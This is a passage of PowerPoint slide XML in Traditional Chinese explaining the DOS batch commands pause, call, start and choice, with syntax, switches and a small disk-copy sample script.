              <a:t>@Rem Here is the description.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="81603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5DC2B-F85E-48CB-8E3E-A48790644FE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Pause </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>命令</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F3899B34-AB86-475A-913D-3D51C905A7D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>運行 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Pause </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>命令時，將顯示下面的消息：</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Press any key to continue . . .</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Sample</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>@echo off</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:begin</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>copy a:*.* d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>\back</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>echo Please put a new disk into driver A</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>pause</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>goto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> begin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>在這個例子中，驅動器 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>中磁盤上的所有文件均複製到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>d:\back</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>中。顯示的註釋提示您將另一張磁盤放入驅動器 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>時，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>pause</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>命令會使程序掛起，以便您更換磁盤，然後按任意鍵繼續處理。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="168011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E130C0-53BF-4023-BFAF-39029C88ED8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>命令</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E78FE2E-AE11-4629-8ECA-3651413AF994}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>從一個批處理程序調用另一個批處理程序，並且不終止父批處理程序。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>命令接受用作調用目標的標籤。如果在腳本或批處理文件外使用 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，它將不會在命令行起作用。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>語法</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>call [[Drive:][Path] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>FileName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>BatchParameters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>]] [:label [arguments]]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>參數</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>[Drive:}[Path] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>FileName</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>指定要調用的批處理程序的位置和名稱。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>filename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>參數必須具有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>.bat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>擴展名。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="230772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87FCA-45BA-4B5E-8304-00C5223100B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>start </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>命令</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6D94569-6DB4-4262-ADE7-50FB507F784A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>調用外部程序，所有的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>命令和命令行程序都可以由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>命令來調用。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>入侵常用參數：</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>MIN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>開始時窗口最小化</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>SEPARATE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>在分開的空間內開始 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>16 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>位 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>程序</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>HIGH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>HIGH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>優先級類別開始應用程序</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>REALTIME </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>REALTIME </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>優先級類別開始應用程序</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>WAIT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>啟動應用程序並等候它結束</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>parameters </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>這些為傳送到命令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>程序的參數</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>執行的應用程序是 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>32-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>位 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>GUI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>應用程序時，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>CMD.EXE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>不等應用程序終止就返回命令提示。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>如果在命令腳本內執行，該新行為則不會發生。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="135247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B53254-CCC7-43C6-B912-2FE5C045BD46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>choice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>命令</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="內容版面配置區 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05CCAECD-E442-4434-B621-F5945A975E8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>choice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>使用此命令可以讓用戶輸入一個字符，從而運行不同的命令。使用時應該加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/c:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>參數</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>c:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>後應寫提示可輸入的字符，之間無空格。它的返回碼為</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>1234……</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>: choice /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>c:dme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>defrag,mem,end</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>將顯示</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>defrag,mem,end</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>[D,M,E]?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Sample</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Sample.bat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>的內容如下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
